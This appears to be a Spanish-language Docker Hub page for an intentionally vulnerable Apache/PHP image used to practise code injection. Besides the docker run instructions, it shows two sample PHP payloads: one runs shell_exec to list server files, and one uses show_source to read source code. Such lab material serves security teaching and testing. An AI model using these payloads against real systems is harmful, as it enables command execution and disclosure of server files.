Sign inSign up

ingenieroricardo/codeinjection

By ingenieroricardo

Updated over 1 year ago

Servidor apache + php 8.4.5 con aplicativo web vulnerable a inyecciones de codigo.

Image
0

267

ingenieroricardo/codeinjection repository overview

Code Injection

Se uso la imagen: php:8.4.5-apache como base.

Descargar y Montar el servidor con Docker:

docker pull ingenieroricardo/codeinjection
docker run --publish 8181:80 ingenieroricardo/codeinjection

Al no tener validaciones se pueden enviar PHP que se pueden ejecutar como estos:

<?php
  $salida = shell_exec("cd .. && ls");
  echo "<pre>$salida</pre>";
?>

Con este codigo podemos conocer los archivos en el servidor

<?php
  show_source("../archivos.php");
?>

Con este codigo podemos ver codigo fuente

Tag summary

Content type

Image

Digest

sha256:7030da621

Size

172.3 MB

Last updated

over 1 year ago

docker pull ingenieroricardo/codeinjection